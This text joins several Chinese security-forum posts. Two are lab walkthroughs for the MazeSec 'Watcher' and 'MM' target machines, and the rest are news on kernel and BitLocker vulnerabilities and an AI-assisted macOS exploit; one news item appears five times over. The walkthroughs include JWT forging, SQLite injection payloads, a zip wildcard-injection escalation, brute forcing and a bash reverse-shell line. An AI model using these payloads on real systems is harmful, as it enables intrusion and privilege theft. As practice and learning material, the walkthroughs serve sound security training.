靶机来自 MazeSec(迷踪安全): MazeSec | About 靶机名:Watcher 作者 :Yolo 也是很久没有打了,前面的都是打完很久才来复盘。这次来个新鲜的,刚出来,今天刚打完的靶机。 关于靶机配置之前讲过了,这里就不多说了。 最近换成用wsl的kali了,只能是nat网络,所以靶机都用的Host-only,所以都是走的 192.168.56.0/24这个网段 该网段windows侧的ip为 192.168.56.1 。这样会导致我的kali能访问到靶机,但是靶机访问不到kali。 这里就相当于windows和靶机都是一个”公网ip“,kali是windows的nat后面的”私网ip“ 我换wsl主要是不想每次去多开一台虚拟机,还有vmware那个桥接网络不知道为什么ip老是变甚至有时候ipv4都没有,还要我手动续租什么的。但是这也有个问题就是反弹shell就做不了,我的做法是windows上装一个nc监听来平替。 话不多说,直接开打。 信息收集 靶机ip: 192.168.56.106 端口扫描 ┌──(kali㉿JYlover)-[~/tmp] └─$ nmap -p- 192.168.56.106 开放22、5000端口。 只有一个5000端口有价值,但是我们又不知道 upnp 是啥,我尝试去浏览器访问一下。 是一个web页面,那么入口点肯定就是web了,那我们就开始web渗透 web渗透 看到登录框先是尝试了一下sql注入等。但是都没什么用,这里不知道怎么办的话可以先扫一下目录,这也是一般web渗透的流程。 就只有一个登录一个注册。 那我们直接注册一个账号好了。 进来后我们尝试访问系统管理页面,但是发现说我们权限不足,权限是 normal 这里的权限认证大概率就是jwt了,但是我们还是尝试抓个包看看 果然就是jwt。我们去爆破一下密钥。 python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imp5bGkiLCJsZXZlbCI6Im5vcm1hbCIsImlhdCI6MTc4MDM4NDE4MywiZXhwIjoxNzgwMzg3NzgzfQ.vjfC3JLnFq0q4BoVYbpe3QQQFyFytl751JD5hTiwDDU -C -d jwtkey.txt 成功拿到jwt密钥: maze 尝试伪造。 python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imp5bGkiLCJsZXZlbCI6Im5vcm1hbCIsImlhdCI6MTc4MDM4NDE4MywiZXhwIjoxNzgwMzg3NzgzfQ.vjfC3JLnFq0q4BoVYbpe3QQQFyFytl751JD5hTiwDDU -I -pc level -pv admin -S hs256 -p "maze" 拿到密钥: [+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imp5bGkiLCJsZXZlbCI6ImFkbWluIiwiaWF0IjoxNzgwMzg0MTgzLCJleHAiOjE3ODAzODc3ODN9.EP8qh3LLC4wozyqw3n-yFHuyfZi5uIoPvD8f34972XM 也可以直接去jwt官网用密钥修改。 然后直接去浏览器的 开发者工具–>应用–>cookie中替换新的jwt即可: 然后就可以正常进入系统管理页面了。 然后是改系统设置的地方,这里抓个包。 我们在value这里试试也没有sql注入。 造成sql语法报错,存在sql注入,而且这里大概率是update语句,那union注入就行不通了。但是因为这里会把更新成功的value给回显出来,所以我们尝试子查询。 这里是报没有 database() 函数,那说明我们的sql语句是没问题的,只是函数错了,那这是个好事啊。说明只是这不是mysql数据库,查询是对的,我们换sqlite的函数试试。 果然是sqlite。那后面就是直接sql注入了,不过多讲解。 最终payload: {"key":"theme","value":"light',value = (select group_concat(tbl_name) from sqlite_master )--+"} # "current_value": "users,users,sqlite_sequence,settings,settings,secret" {"key":"theme","value":"light',value = (select group_concat(sql) from sqlite_master where tbl_name = 'secret' )--+"} # "current_value": "CREATE TABLE secret (id INTEGER PRIMARY KEY AUTOINCREMENT,secret TEXT NOT NULL )" {"key":"theme","value":"light',value = (select group_concat(secret) from secret )--+"} # "current_value": "watcher:mazesec123q1231w!@#!@@#$" 获得登录凭证: watcher:mazesec123q1231w!@#!@@#$ 然后就可以直接ssh登录了。 flag{user-c3949567202847f1ad8664095f0a94e4} 权限提升 我们先老规矩传 pspy64 上去看看: 注意到这里两行: 2026/06/02 08:15:50 CMD: UID=0 PID=408 | /bin/bash /opt/autoarchive/sync.sh 2026/06/02 08:15:50 CMD: UID=0 PID=407 | inotifywait -m -e create /home/watcher/uploads 以root身份执行的一个一个脚本 /opt/autoarchive/sync.sh 可能是脚本中执行的命令 :inotifywait是监控文件系统的工具 $ inotifywait -m -e create /home/watcher/uploads # -m参数:持续监控模式。 # -e参数:指定事件类型 ,这里指定creat事件 实时监控 /home/watcher/uploads 目录,当有新文件或子目录创建时,立即输出事件信息。 说明如果uploads文件夹发生变化会触发一些东西。那这个uploads文件夹我们去看看。 随便在目录下创建一点东西。 创建的瞬间就自动执行了脚本 /opt/autoarchive/archive-helper ,肯定是想去看看这个脚本是做什么的,但是这个目录我们没有权限 watcher@Watcher:/opt$ ls -al total 16 drwxr-xr-x 4 root root 4096 May 22 12:16 . drwxr-xr-x 18 root root 4096 May 16 05:19 .. drwx------ 2 root root 4096 May 22 12:29 autoarchive drwxr-xr-x 5 www-data www-data 4096 May 22 11:55 watcher 这里我们虽然不知道这个脚本是做什么的,但是静下来想一下: 一个脚本,参数是我们刚刚创建的文件。那么就很有可能是监控并把产生的文件给打包到哪里去吧。但是想不到打包这个操作也没事(而且zip,gzip,这么多打包命令也不知道是哪个) 此时我们可以打开pspy的文件系统监控功能。 watcher@Watcher:~$ ./pspy64 -fp # pspy默认是监控进程,但是有了-f参数就是文件系统,-p参数是进程,所以我们同时监控两个 很明显抓到了调用了zip命令。 这里是有几率抓到一条zip命令的进程的,只是我们的文件太小了,zip压缩太快了,而pspy的原理其实是通过查看/proc目录实现监控的,所以太快的话就可能抓不到。 这里抓到这个包是要有点运气的,比较稳的方法是压缩一个超大文件,这里我就没有去演示了。 还有一点是实验可以发现,这个脚本应该就只是检测txt文件,如果是其他文件的话不会触发压缩。 既然是zip命令的话我们就很明显了,应该是使用zip打包时使用了通配符打包所有文件。 那这样就存在一个通配符参数注入的问题。 我们查一下 GTFObins 是可以做到命令执行和文件读取的,我们可以利用文件名做参数注入: 先准备一个反弹shell的脚本 watcher@Watcher:~/uploads$ cat shell.txt #!/bin/bash bash -i >& /dev/tcp/192.168.56.1/9999 0>&1 给脚本添加可执行权限,并创建参数注入文件 watcher@Watcher:~/uploads$ chmod +x shell.txt watcher@Watcher:~/uploads$ >'-T -TT shell.txt' 然后nc监听等待回弹shell就好了(我这里又创建一个1.txt是为了触发脚本) 关于zip提权 这里稍微了解一下zip的这个参数问题。 zip存在两个参数: -T :测试zip文件完整性, -T 会调用 unzip -tqq 来测试 -TT :用你指定的命令来测试,如: -TT cmd :使用 cmd 作为解压测试的命令。zip 会创建一个临时文件,执行 cmd tmpfile.zip ,如果命令返回 0 则认为测试通过。 注意 :这里的 cmd 是一个外部可执行程序,也就是说它可以是一个命令,也可以是一个shell脚本。 所以这里就会执行这个命令 回到我们构造的payload: 我创建了一个文件: watcher@Watcher:~/uploads$ >'-T -TT shell.txt' 此时文件夹存在文件 -T -TT shell.txt 和文件 shell.txt 其中shell.txt是反弹shell脚本。 此时后台root可能执行了: zip shell.txt -T -TT shell.txt 后面这个文件就被当作参数执行了。 其他做法 这里分享一些其他解法。来自其他群友的wp sleep替换 解法来自——Aristore 附上群友wp截图: 说实话这里的sleep命令的发现,我还没有复刻,不管是pspy还是上面的命令都没有抓到。 但是这个方法是稳定可行的。 原因是他这里看了 /proc/$NEW_PID/cmdline ,这个文件里是进程的启动命令。 所以启动命令是 sleep 3 ,这里使用的相对路径,我们可以直接看一下脚本源码: root@Watcher:/home/watcher/uploads# cat /opt/autoarchive/sync.sh cat /opt/autoarchive/sync.sh #!/bin/bash WATCH_DIR="/home/watcher/uploads" HELPER_PATH="${AUTOARCHIVE_HELPER:-/usr/local/bin/archive-helper}" mkdir -p /root/backups inotifywait -m -e create "$WATCH_DIR" | while read -r path action file do case "$file" in *.txt) sleep 3 cd "$WATCH_DIR" || exit 1 export PATH="$WATCH_DIR:$PATH" # Archive all .txt files after each new .txt file event. "$HELPER_PATH" *.txt >> /var/log/autosync.log 2>&1 ;; esac done 其实这个方法之所以能成功是很多巧合的,所以也只能算是学习一种思路吧。 这里看一下出题人说的: 是为了预期解能成功所以添加了PATH变量,再加上sleep没有使用绝对路径(一般都不会用绝对路径吧),所以导致执行sleep时会默认去uploads目录下找,此时我们在uploads下创建sleep文件才能被执行。算是一种非预期解吧。 CVE-2026-43494-PinThef 解法来自——BR 该内核漏洞也可直接提权,这里这个CVE我还没有太了解过,就没有复现了,后续可能找时间了解。大家可自行复现。 这里附上群友的wp截图: 知识点总结 通过这次靶机可以了解到以下知识点,大家打完后可以复习一下: jwt 的密钥爆破及payload伪造 sqlite注入(UPDATE的注入使用子查询,而不是union等) zip命令的通配符参数注入( -T -TT shell.txt ) sleep命令替换(非预期,可学习思路) 1 个帖子 - 1 位参与者 阅读完整话题
靶机来自 MazeSec(迷踪安全): MazeSec | About 靶机名:MM 作者 :dsz AI总结 今天复盘一下MM靶机。 为了防止有新手不知道打靶机的流程,这次从部署环境开始。(因为我一开始是打ctf的,第一次打靶机还真不知道怎么开始) 环境搭建 本次教程都以MazeSec自制靶机举例,其他的都万变不离其宗。 我们首先下载好靶机环境文件,一般都是一个ova文件。全称:Open Virtualization Appliance(开放虚拟化设备) 其中包括了完整配置信息和虚拟磁盘数据(也就是打开即用的虚拟机,基本不需要在配置,除了网络之类的) 拿到靶机后我们用 VirtualBox 打开(MazeSec的靶机优先支持 VirtualBox , VMware 有可能会有找不到网卡的情况) 我们依次点击:管理—>导入虚拟电脑—>选择文件(需要的靶机ova文件) 我们可以选择改一下位置,我改成了D盘里自建的文件夹。 然后点击完成。等待导入完全(右上角有进度条) 导入后右边可以看到配置详情,我们几乎不要去管,但是有时候会碰到没有找到ip的情况,我们看一看网络设置对不对。这里建议直接选择桥接,特别是对于 VMware 上部署kali的师傅,两个平台的nat网段是不同的(如果你是网络高手或许可以自己去调一下,相关密码需要进入社区获取 ) 然后双击即可打开靶机。我们打开可能会遇到如下报错,不要管他,点一下更改网络设置然后点确定退出就好了。 信息收集 打开靶机后我们就不要管他了(也可以看,我是为了尽量模拟真实环境) 回到我们的攻击机(kali等),注意kali也要桥接哦~ 我们nmap起手收集一下目标ip $ nmap 172.20.10.0/24 -sn #-sn是只发ping包扫描 找到VirtuaBox的网卡就是靶机地址了。 ip: 172.20.10.3 然后在扫一下端口开放情况。 $ nmap -p- 172.20.10.3 #-p-代表扫描全端口 开放 22 、 80 、 5901 、 6001 四个端口。 vnc复盘 VNC 是一种让你用一台电脑(客户端)远程操作另一台电脑(服务器)桌面的技术 5901/tcp :VNC 服务的主端口 大门 ,你从这里连接进去| 6001/tcp :X11 服务端口(Linux图形底层) 内部管道 ,服务器自己用的,你不需要管它| :1 :(显示编号)这是第1号图形会话 如果同时开多个桌面,就是 :1 、 :2 …| 连接命令: vncviewer 172.20.10.3:5901 就和22端口的ssh一样,但是这里突然开始一个vnc也很不正常,需要留意一下。 和ssh一样有可能被暴力破解的可能 初步渗透测试-获取user-shell 我们一般有web的话就先去web看看,因为web的洞会简单一点。 一个静态页面,没思路,那么就去扫一下目录。 $ dirsearch -u 172.20.10.3 看到泄露了很多git文件,那么就是git泄露,我们用工具扒下来看看。 root@JYlover:~/webtool/GitHacker# githacker --url http://172.20.10.3/.git/ --output-folder result 看到有几次提交记录,我们能得到一个域名 mm.dsz 这里我尝试添加一个hosts记录,果然访问到一个登录页面。 不能输入和点击,尝试修改前端代码,但是最后发现完全没有用,就是一个壳子。那这条路就断了。 注意,这里由于环境变化,下面的ip和上面不一样,大家自行理解一下。 于是我们只能再次回到git。 我把几次的git记录都看了一遍,发现过程中添加又删除了一个密码 sublarge 。 尝试用它登录ssh或者vnc,但是都不对。 那没办法,git里也没有什么信息了(4次提交都看过了) 那就只剩下爆破这条路了。我们hydra试试。 ┌──(kali㉿JYlover)-[~] └─$ hydra -l mingmingjiu -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.103 -t 4 -e nsr 这里添加 -e nsr 参数测试了弱密码,没想到果然就是用户名复用。 那我们尝试ssh登录。 ┌──(kali㉿JYlover)-[~] └─$ ssh [email protected] #password:mingmingjiu 但是发现登陆成功却直接退出。 原因是该用户的shell被禁用,但是密码是正确的。 既然shell被禁用了,我们可以想到,这里留一个vnc是做什么的,是否存在密码复用问题呢,尝试登录。 ┌──(kali㉿JYlover)-[~] └─$ vncviewer 192.168.56.103:5901 # password:mingmingjiu 成果登录上了vnc桌面。 权限提升-获取root-shell 我们现在是没有shell权限的,那么怎么办呢,这里有一个办法是用其他终端, xterm 然后这里就直接弹了一个shell回来,做权限维持 关于shell权限复盘 这里为什么我们不能ssh登录,也不能直接用terminal,但是用xterm这些古老的终端却可以。 我们先看一下用户信息: mingmingjiu@MM:~$ cat /etc/passwd 能看到mingmingjiu用户的默认shell是 /usr/sbin/nologin 我们ssh登录时:验证成功后,系统会尝试启动你在 /etc/passwd 中定义的 Shell(例如 /bin/bash) 如果定义的是 /usr/sbin/nologin ,系统就会运行这个程序,它会打印一段文字(通常是 “This account is currently not available.”),然后直接断开连接。 而自带terminal也是直接去打开默认shell,但是这里默认shell是 nologin 。 而古老的 xterm ,他不知道去主动找用户默认shell,而是呆呆的直接启动一个sh 所以他没有收到/etc/passwd的影响。 得到shell之后我们就尝试去权限提升了。 我们传一个pspy64到靶机(这是一个监控程序,会一直监控当前的进程,主要是发现一些存在的定时任务等) 这里可能有些刚接触靶机的师傅会不知道,一般我们打靶机会自备一些常用的工具箱,里面有一些什么漏洞扫描,进程监控等等工具,到了提权的时候可以把工具传上去帮助我们信息收集。例如: 这里就是我的工具箱,获得低权限shell时起http服务传一些工具上去。然后靶机上下载下来直接监控: mingmingjiu@MM:~$ wget 192.168.56.1:8888/pspy64 就不全部截图了,有点长,大家明白意思就好了。 然后我们直接pspy监控进程: mingmingjiu@MM:~$ chmod +x pspy64 chmod +x pspy64 mingmingjiu@MM:~$ ./pspy64 明显能看到有些程序在重复执行,而且还是以root身份执行的(UID=0),说明很有可能是作者留给我们的提权点。 能注意到其中有一个 /bin/sh -c /bin/bash /opt/a.sh 一直作为定时任务在执行,后面应该就是它里面执行的命令了。 我们去看看这个文件。 mingmingjiu@MM:~$ cat /opt/a.sh 是bash执行gocr后的结果,这个gocr是什么,我们可以去问一下ai。 很简单,就是把图片里面的文本识别出来。OCR模型就是这个作用。 也就是说如果我们有一张图片 1.png , 里面写着id 然后我们执行gocr ./1.png | bash 就会输出id命令的结果。 那么就很简单了,也就是说只要我们把 /tmp/go.png 换成我们自制的命令图片,然后等定时任务执行。那就可以以root身份执行任意命令了。达到定时任务提权的目的。 总结 总结一下这次靶机接触到的一些知识吧。 vnc是一种和ssh类似的连接远程桌面的技术,通过命令连接 vncviewer <ip>:<port> 当 /etc/passwd 中给用户默认shell指定为 /usr/sbin/nologin 时会导致ssh,以及现代的终端模拟器失效。此时可以使用一些古老的终端如 xterm 等直接起一个终端,而不是走默认终端。 可以通过工具等,多注意定时任务的执行 2 个帖子 - 2 位参与者 阅读完整话题
IT之家 5 月 22 日消息,科技媒体 cyberkendra 昨日(5 月 21 日)发布博文,报道称 Windows 内核曝出严重漏洞, 攻击者可穿透 Chrome 等主流浏览器,提权至 Windows 11 系统最高权限。 该漏洞追踪编号为 CVE-2026-40369,位于 ntoskrnl.exe 的 nt!ExpGetProcessInformation 函数,CVSS 评分 7.8,影响 Windows 11 24H2 和 25H2,微软已经在本月补丁星期二活动日发布的累积更新中修复。 该漏洞是安全研究者 Paolo Stagno 为 Pwn2Own Berlin 2026 准备,但 CVE 编号在比赛前几天被分配并公开,导致参赛计划中止。 随后研究者 Ori Nimron 在 GitHub 发布三层利用代码:基础 PoC、完整利用程序和 Chrome 沙箱模拟器变体。 根据安全示例,攻击者调用 NtQuerySystemInformation 并传入信息类 253( SystemProcessInformationExtension ),同时将输出缓冲区设为内核地址、长度设为零,即可绕过 ProbeForWrite 校验。 Windows 内核的 ProbeForWrite 机制在长度为零时完全不执行检查,导致未验证的内核指针直接进入 ExpGetProcessInformation 函数。 NtQuerySystemInformation 调用不受 Chrome 的 win32k 锁定、受限 Tokens 或不可信完整性级别检查限制,因此 Chrome、Edge、Firefox 的渲染器沙箱均可触发该漏洞,研究者描述利用成功率为 100% 确定性。 结合开源 prefetch-tool 绕过 KASLR,攻击者可从沙箱内浏览器标签页,通过两步链式攻击获取完整系统控制权。 IT之家附上参考地址 CVE-2026-40369: Arbitrary Kernel Address Increment via NtQuerySystemInformation (Class 253) Arbitrary Kernel Address Increment via NtQuerySystemInformation
IT之家 5 月 21 日消息,科技媒体 cyberkendra 昨日(5 月 20 日)发布博文, 报道称 Linux 内核再次曝光名为 PinTheft 的提权漏洞,相关补丁已经进入上游内核。 在 Copy Fail (4 月 29 日)、 Dirty Frag (5 月 7 日)、Fragnesia (5 月 13 日)以及 Qualys 威胁研究部门(TRU)披露 CVE-2026-46333 漏洞外,这是过去 3 周内曝光的第 5 个高危漏洞。 PinTheft 漏洞由 V12 安全团队的 Aaron Esau 发现,问题出在 RDS(Reliable Datagram Sockets,可靠数据报套接字)的零拷贝发送路径。 rds_message_zcopy_from_user()在逐页把用户态内存固定到内核空间后,如果后续页面触发错误,错误处理路径会先释放已固定页面;但后续 RDS 消息清理又会再次释放一次,于是形成 double-free。 单看引用计数错误,这类问题通常不容易直接变成稳定提权。不过 PinTheft 把 io_uring 拉进了利用链。 攻击者先把一个匿名内存页注册成 io_uring 固定缓冲区,并赋予 1024 个引用偏置;随后通过 1024 次故意失败的 RDS 发送,逐步耗尽这些引用,最终让 io_uring 手里留下一个本不该再持有的悬空指针。 接下来,利用代码会把目标 SUID 二进制的第一页逐出缓存,再回收同一个物理页,并借助 io_uring 的悬空缓冲区指针覆写特权程序的页缓存。 原文提到, /usr/bin/su 、passwd 和 pkexec 都是优先目标,攻击者随后运行被改写的程序,就能直接拿到 root shell。 不过,这个漏洞的利用门槛并不算低。除了需要加载 RDS 模块,系统还必须启用 io_uring,存在可读的 SUID-root 二进制文件,并且运行在 x86_64 平台。 按原文测试结果,在常见发行版中,只有 Arch Linux 默认加载了所需的 RDS 模块,其他主流发行版并不会开箱即用加载它,因此受影响范围相对有限。 IT之家附上参考地址 PinTheft
github.com pocs/pintheft at main · v12-security/pocs main/pintheft poc it like it's hot. Contribute to v12-security/pocs development by creating an account on GitHub. PinTheft是一个Linux本地提权漏洞,位于RDS协议的零拷贝发送路径中。该漏洞利用了一个双重释放问题,结合 io_uring 固定缓冲区特性,实现了对页缓存的覆盖,最终可获取root权限。 缓解:不需要rds,可以把rds禁用 rmmod rds_tcp rds printf 'install rds /bin/false\ninstall rds_tcp /bin/false\n' > /etc/modprobe.d/pintheft.conf 2 个帖子 - 2 位参与者 阅读完整话题
https://www.ithome.com/0/950/111.htm IT 之家 5 月 14 日消息,科技媒体 bleepingcomputer 昨日( 5 月 13 日)发布博文,报道称网络安全专家 Chaotic Eclipse 披露 YellowKey 与 GreenPlasma 两个漏洞,影响 Windows 11 、Windows Server 2022/2025 等系统。 基于披露的漏洞细节,YellowKey 可以绕过系统的 BitLocker 防护,影响 Windows 11 、Windows Server 2022 、Windows Server 2025 等系统。 Eclipse 指出在 USB 优盘中放入特制的 FsTx 文件,或者写入目标磁盘的 EFI 分区,再重启进入 WinRE ,通过按住 CTRL 键触发 shell 。若利用成功,这个 shell 将直接访问受 BitLocker 保护、但已在启动流程中自动解锁的存储卷。 独立安全研究员 Kevin Beaumont 确认 YellowKey 有效,并建议启用 BitLocker PIN 与 BIOS 密码缓解风险。Will Dormann 也确认了基于 USB 中 FsTx 文件的利用链,但未复现 EFI 分区路径。 不过对于普通用户而言,影响范围相对有限,现阶段公开的 YellowKey 漏洞概念验证仅支持开启 TPM BitLocker 保护且无密码保护的设备。 而另一个 GreenPlasma 漏洞则用于本地提权,普通权限用户可在 SYSTEM 可写的目录对象中创建任意内存节对象,进而影响信任这些路径的高权限服务或驱动。 不过,当前披露的概念验证并不完整,缺少拿到完整 SYSTEM shell 的关键组件,因此外界暂时只能确认存在提权思路,还不能把它视为开箱即用的完整攻击工具。 https://github.com/Nightmare-Eclipse/YellowKey https://deadeclipse666.blogspot.com/2026/05/were-doing-silent-patches-now-huh-also.html https://github.com/Nightmare-Eclipse/GreenPlasma
https://www.ithome.com/0/950/111.htm IT 之家 5 月 14 日消息,科技媒体 bleepingcomputer 昨日( 5 月 13 日)发布博文,报道称网络安全专家 Chaotic Eclipse 披露 YellowKey 与 GreenPlasma 两个漏洞,影响 Windows 11 、Windows Server 2022/2025 等系统。 基于披露的漏洞细节,YellowKey 可以绕过系统的 BitLocker 防护,影响 Windows 11 、Windows Server 2022 、Windows Server 2025 等系统。 Eclipse 指出在 USB 优盘中放入特制的 FsTx 文件,或者写入目标磁盘的 EFI 分区,再重启进入 WinRE ,通过按住 CTRL 键触发 shell 。若利用成功,这个 shell 将直接访问受 BitLocker 保护、但已在启动流程中自动解锁的存储卷。 独立安全研究员 Kevin Beaumont 确认 YellowKey 有效,并建议启用 BitLocker PIN 与 BIOS 密码缓解风险。Will Dormann 也确认了基于 USB 中 FsTx 文件的利用链,但未复现 EFI 分区路径。 不过对于普通用户而言,影响范围相对有限,现阶段公开的 YellowKey 漏洞概念验证仅支持开启 TPM BitLocker 保护且无密码保护的设备。 而另一个 GreenPlasma 漏洞则用于本地提权,普通权限用户可在 SYSTEM 可写的目录对象中创建任意内存节对象,进而影响信任这些路径的高权限服务或驱动。 不过,当前披露的概念验证并不完整,缺少拿到完整 SYSTEM shell 的关键组件,因此外界暂时只能确认存在提权思路,还不能把它视为开箱即用的完整攻击工具。 https://github.com/Nightmare-Eclipse/YellowKey https://deadeclipse666.blogspot.com/2026/05/were-doing-silent-patches-now-huh-also.html https://github.com/Nightmare-Eclipse/GreenPlasma
https://www.ithome.com/0/950/111.htm IT 之家 5 月 14 日消息,科技媒体 bleepingcomputer 昨日( 5 月 13 日)发布博文,报道称网络安全专家 Chaotic Eclipse 披露 YellowKey 与 GreenPlasma 两个漏洞,影响 Windows 11 、Windows Server 2022/2025 等系统。 基于披露的漏洞细节,YellowKey 可以绕过系统的 BitLocker 防护,影响 Windows 11 、Windows Server 2022 、Windows Server 2025 等系统。 Eclipse 指出在 USB 优盘中放入特制的 FsTx 文件,或者写入目标磁盘的 EFI 分区,再重启进入 WinRE ,通过按住 CTRL 键触发 shell 。若利用成功,这个 shell 将直接访问受 BitLocker 保护、但已在启动流程中自动解锁的存储卷。 独立安全研究员 Kevin Beaumont 确认 YellowKey 有效,并建议启用 BitLocker PIN 与 BIOS 密码缓解风险。Will Dormann 也确认了基于 USB 中 FsTx 文件的利用链,但未复现 EFI 分区路径。 不过对于普通用户而言,影响范围相对有限,现阶段公开的 YellowKey 漏洞概念验证仅支持开启 TPM BitLocker 保护且无密码保护的设备。 而另一个 GreenPlasma 漏洞则用于本地提权,普通权限用户可在 SYSTEM 可写的目录对象中创建任意内存节对象,进而影响信任这些路径的高权限服务或驱动。 不过,当前披露的概念验证并不完整,缺少拿到完整 SYSTEM shell 的关键组件,因此外界暂时只能确认存在提权思路,还不能把它视为开箱即用的完整攻击工具。 https://github.com/Nightmare-Eclipse/YellowKey https://deadeclipse666.blogspot.com/2026/05/were-doing-silent-patches-now-huh-also.html https://github.com/Nightmare-Eclipse/GreenPlasma
https://www.ithome.com/0/950/111.htm IT 之家 5 月 14 日消息,科技媒体 bleepingcomputer 昨日( 5 月 13 日)发布博文,报道称网络安全专家 Chaotic Eclipse 披露 YellowKey 与 GreenPlasma 两个漏洞,影响 Windows 11 、Windows Server 2022/2025 等系统。 基于披露的漏洞细节,YellowKey 可以绕过系统的 BitLocker 防护,影响 Windows 11 、Windows Server 2022 、Windows Server 2025 等系统。 Eclipse 指出在 USB 优盘中放入特制的 FsTx 文件,或者写入目标磁盘的 EFI 分区,再重启进入 WinRE ,通过按住 CTRL 键触发 shell 。若利用成功,这个 shell 将直接访问受 BitLocker 保护、但已在启动流程中自动解锁的存储卷。 独立安全研究员 Kevin Beaumont 确认 YellowKey 有效,并建议启用 BitLocker PIN 与 BIOS 密码缓解风险。Will Dormann 也确认了基于 USB 中 FsTx 文件的利用链,但未复现 EFI 分区路径。 不过对于普通用户而言,影响范围相对有限,现阶段公开的 YellowKey 漏洞概念验证仅支持开启 TPM BitLocker 保护且无密码保护的设备。 而另一个 GreenPlasma 漏洞则用于本地提权,普通权限用户可在 SYSTEM 可写的目录对象中创建任意内存节对象,进而影响信任这些路径的高权限服务或驱动。 不过,当前披露的概念验证并不完整,缺少拿到完整 SYSTEM shell 的关键组件,因此外界暂时只能确认存在提权思路,还不能把它视为开箱即用的完整攻击工具。 https://github.com/Nightmare-Eclipse/YellowKey https://deadeclipse666.blogspot.com/2026/05/were-doing-silent-patches-now-huh-also.html https://github.com/Nightmare-Eclipse/GreenPlasma
https://www.ithome.com/0/950/111.htm IT 之家 5 月 14 日消息,科技媒体 bleepingcomputer 昨日( 5 月 13 日)发布博文,报道称网络安全专家 Chaotic Eclipse 披露 YellowKey 与 GreenPlasma 两个漏洞,影响 Windows 11 、Windows Server 2022/2025 等系统。 基于披露的漏洞细节,YellowKey 可以绕过系统的 BitLocker 防护,影响 Windows 11 、Windows Server 2022 、Windows Server 2025 等系统。 Eclipse 指出在 USB 优盘中放入特制的 FsTx 文件,或者写入目标磁盘的 EFI 分区,再重启进入 WinRE ,通过按住 CTRL 键触发 shell 。若利用成功,这个 shell 将直接访问受 BitLocker 保护、但已在启动流程中自动解锁的存储卷。 独立安全研究员 Kevin Beaumont 确认 YellowKey 有效,并建议启用 BitLocker PIN 与 BIOS 密码缓解风险。Will Dormann 也确认了基于 USB 中 FsTx 文件的利用链,但未复现 EFI 分区路径。 不过对于普通用户而言,影响范围相对有限,现阶段公开的 YellowKey 漏洞概念验证仅支持开启 TPM BitLocker 保护且无密码保护的设备。 而另一个 GreenPlasma 漏洞则用于本地提权,普通权限用户可在 SYSTEM 可写的目录对象中创建任意内存节对象,进而影响信任这些路径的高权限服务或驱动。 不过,当前披露的概念验证并不完整,缺少拿到完整 SYSTEM shell 的关键组件,因此外界暂时只能确认存在提权思路,还不能把它视为开箱即用的完整攻击工具。 https://github.com/Nightmare-Eclipse/YellowKey https://deadeclipse666.blogspot.com/2026/05/were-doing-silent-patches-now-huh-also.html https://github.com/Nightmare-Eclipse/GreenPlasma
https://www.ithome.com/0/950/111.htm IT 之家 5 月 14 日消息,科技媒体 bleepingcomputer 昨日( 5 月 13 日)发布博文,报道称网络安全专家 Chaotic Eclipse 披露 YellowKey 与 GreenPlasma 两个漏洞,影响 Windows 11 、Windows Server 2022/2025 等系统。 基于披露的漏洞细节,YellowKey 可以绕过系统的 BitLocker 防护,影响 Windows 11 、Windows Server 2022 、Windows Server 2025 等系统。 Eclipse 指出在 USB 优盘中放入特制的 FsTx 文件,或者写入目标磁盘的 EFI 分区,再重启进入 WinRE ,通过按住 CTRL 键触发 shell 。若利用成功,这个 shell 将直接访问受 BitLocker 保护、但已在启动流程中自动解锁的存储卷。 独立安全研究员 Kevin Beaumont 确认 YellowKey 有效,并建议启用 BitLocker PIN 与 BIOS 密码缓解风险。Will Dormann 也确认了基于 USB 中 FsTx 文件的利用链,但未复现 EFI 分区路径。 不过对于普通用户而言,影响范围相对有限,现阶段公开的 YellowKey 漏洞概念验证仅支持开启 TPM BitLocker 保护且无密码保护的设备。 而另一个 GreenPlasma 漏洞则用于本地提权,普通权限用户可在 SYSTEM 可写的目录对象中创建任意内存节对象,进而影响信任这些路径的高权限服务或驱动。 不过,当前披露的概念验证并不完整,缺少拿到完整 SYSTEM shell 的关键组件,因此外界暂时只能确认存在提权思路,还不能把它视为开箱即用的完整攻击工具。 https://github.com/Nightmare-Eclipse/YellowKey https://deadeclipse666.blogspot.com/2026/05/were-doing-silent-patches-now-huh-also.html https://github.com/Nightmare-Eclipse/GreenPlasma
IT之家 5 月 15 日消息,华尔街日报昨日(5 月 14 日)发布博文,报道称安全专家调用 Anthropic 最强 AI 模型 Claude Mythos, 在苹果 macOS 26.4.1 系统中成功提权。 来自安全公司 Calif 的研究人员利用 Claude Mythos 模型,目标针对苹果 macOS 26.4.1 更新,从普通本地账户起步,结合 2 个漏洞,最终拿到 root shell,并绕过了苹果面向 Apple Silicon 的 Memory Integrity Enforcement(内存完整性强制,简称 MIE)保护。 IT之家注:root shell 指系统中最高权限的命令行访问能力。拿到 root shell,意味着攻击者可直接执行高权限命令,修改系统配置、访问受限目录,甚至植入持续控制手段。 而 MIE 是苹果在新一代 Apple Silicon 设备上部署的硬件辅助安全机制,建立在 ARM 的内存标记能力之上,目标是在硬件层直接限制部分内存破坏利用方式,从而降低漏洞稳定复现和提权成功的概率。 攻击起点只是一个无特权本地账户,随后借助标准系统调用、2 个漏洞和多种利用技巧,把权限一路抬升到 root shell。 Mythos 与 macOS 攻击相关视频封面 参与项目的研究员相当重视这次发现,并前往苹果位于库比蒂诺的总部通报结果。后续公开信息显示,这条利用链被描述为“仅数据的内核本地权限提升链”,运行环境是启用 MIE 保护的 Apple M5 硬件。 从技术路径看,这次攻击并不是靠单一漏洞直接突破。研究团队称,Mythos 协助识别了已知漏洞类别,并加快了部分研究流程;真正的利用链则由人类研究员与 AI 共同打磨。 他们在 4 月下旬发现相关问题后,大约用 5 天完成了这条链。由于苹果公司依然在审查这些漏洞,团队没有公布漏洞编号、利用代码和完整技术报告。 参考 First public macOS kernel memory corruption exploit on Apple M5
